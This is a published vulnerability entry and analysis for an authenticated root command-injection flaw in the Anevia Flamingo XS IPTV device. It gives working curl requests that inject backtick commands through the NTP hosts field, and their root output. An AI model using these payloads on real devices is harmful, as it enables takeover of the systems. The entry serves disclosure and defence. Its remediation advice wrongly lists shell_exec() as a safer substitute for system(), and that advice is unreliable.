Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: Remote Language: PHP Published Date: 2023-06-14 
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
                  Hardware revision: 1.1
                  SoapLive 2.4.0
                  SoapSystem 1.3.1

Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.

Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.

Tested on: GNU/Linux 3.14.29 (x86_64)
           Apache/2.2.22 (Debian)
           PHP/5.6.0-0anevia2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php


13.04.2023

--


$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
        <td>uid=33(www-data)</td>
          <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
        <td>gid=33(www-data)</td>
          <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
        <td>groups=33(www-data),6(disk),25(floppy)</td>
          <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>


---


$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
        <td>uid=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
        <td>gid=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
        <td>groups=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>


Anevia Flamingo XS 3.6.5: Authenticated Root Remote Code Execution Vulnerability

The Anevia Flamingo XS 3.6.5, a high-density IPTV head-end system designed for hospitality and corporate environments, has been found to suffer from a critical authenticated remote code execution (RCE) vulnerability. This flaw, disclosed by security researcher Gjoko "LiquidWorm" Krstic, enables an attacker with valid credentials to execute arbitrary commands on the underlying system with root privileges—a level of access that grants full control over the device.

Overview of the Affected System

Flamingo XS is part of Ateme’s Flamingo XL modular platform, which integrates satellite, cable, digital terrestrial, and analog content sources into IP-based streaming networks. It serves as a central hub for delivering live TV and radio to set-top boxes (STBs), PCs, and other IP-connected devices in enterprise and hotel settings.

The device runs on a GNU/Linux 3.14.29 (x86_64) kernel, powered by Apache/2.2.22 and PHP/5.6.0-0anevia2. Its web-based management interface, accessible via http://192.168.1.1/admin, provides administrative control over configuration settings, including network time protocol (NTP) synchronization.

Exploitation Mechanism: Command Injection via NTP Hosts Parameter

The vulnerability arises from improper input validation in the time.php administrative endpoint. Specifically, the ntp_hosts[] parameter—used to define NTP server addresses—is vulnerable to shell command injection due to insufficient sanitization.

When an authenticated user submits a request to update NTP settings, the server processes the ntp_hosts[] values without proper escaping or filtering. This allows attackers to inject arbitrary shell commands enclosed in backticks (`), which are interpreted as command execution in the shell.


curl -sL "http://192.168.1.1/admin/time.php" \
  -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" \
  -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp"

This command injects `id` into the ntp_hosts[] parameter. The server executes the command, returning output that includes:

  • uid=33(www-data)
  • gid=33(www-data)
  • groups=33(www-data),6(disk),25(floppy)

As shown in the response, the system is executing the command as the www-data user—typically a low-privilege web service account. This confirms the injection is active.

Escalation to Root Privileges

Once command injection is confirmed, the attacker can escalate privileges by executing `sudo id`:


curl -sL "http://192.168.1.1/admin/time.php" \
  -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" \
  -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp"

The response now reveals:

  • uid=0(root)
  • gid=0(root)
  • groups=0(root)

This demonstrates that the system is executing commands as root—indicating that the web server process has elevated privileges, or that sudo is configured to allow unauthenticated execution of commands.

Security Implications and Risk Assessment

This vulnerability represents a high-severity threat due to its combination of:

  • Authentication requirement: The attacker must first gain valid credentials, reducing the likelihood of unauthenticated exploitation.
  • Remote code execution: The attacker can run arbitrary commands from any network location with access to the admin interface.
  • Root-level access: Full system control, including file manipulation, service manipulation, and potential persistence.

For enterprise environments, this means an attacker could:

  • Disable security monitoring or logging.
  • Install backdoors or remote access tools.
  • Modify broadcast schedules or content delivery.
  • Exfiltrate sensitive configuration data.
  • Reconfigure network settings to redirect traffic or enable unauthorized access.

Technical Deep Dive: Why This Happens

The root cause lies in the lack of input sanitization in the time.php script. The code likely processes ntp_hosts[] using a function like:


foreach ($_POST['ntp_hosts'] as $host) {
    system("echo $host >> /etc/ntp.conf");
}

Here, system() is invoked without escaping or filtering the input. Because backticks are not removed, an attacker can inject shell commands, and system() executes them directly.

Even if the system does not explicitly use system(), similar functions such as exec(), shell_exec(), or passthru() may be involved, and all are susceptible to command injection if inputs are not validated.

Remediation and Mitigation Strategies

Immediate actions for administrators include:

  • Update firmware: Apply the vendor's patch for version 3.6.5, if available. Check the Ateme product page for official updates.
  • Restrict administrative access: Limit the number of users with admin privileges and enforce strong password policies.
  • Implement network segmentation: Place the Flamingo XS behind firewalls and restrict access to trusted IP ranges.
  • Monitor for suspicious activity: Use IDS/IPS systems to detect unusual command execution patterns or unexpected HTTP POSTs to /admin/time.php.
  • Disable unnecessary features: If NTP configuration is not frequently used, disable the NTP management interface entirely.

Expert Insight: Lessons from this Vulnerability

This case underscores a fundamental principle in secure software development: never trust user input. Even when input is restricted to authenticated users, it must be sanitized, validated, and isolated from execution contexts.

For developers, the following best practices are essential:

  • Use whitelist validation for input fields (e.g., only allow IP addresses or domain names).
  • Replace system() with safer alternatives like escapeshellarg() or shell_exec() with proper escaping.
  • Implement input filtering to block special characters such as `, $, ;, &.
  • Use least privilege models: ensure web processes run under minimal permissions.

Advisory and Reference

For detailed technical analysis and proof-of-concept code, refer to the official advisory:

Advisory ID ZSL-2023-5778
Advisory URL https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
Discovery Date 13 April 2023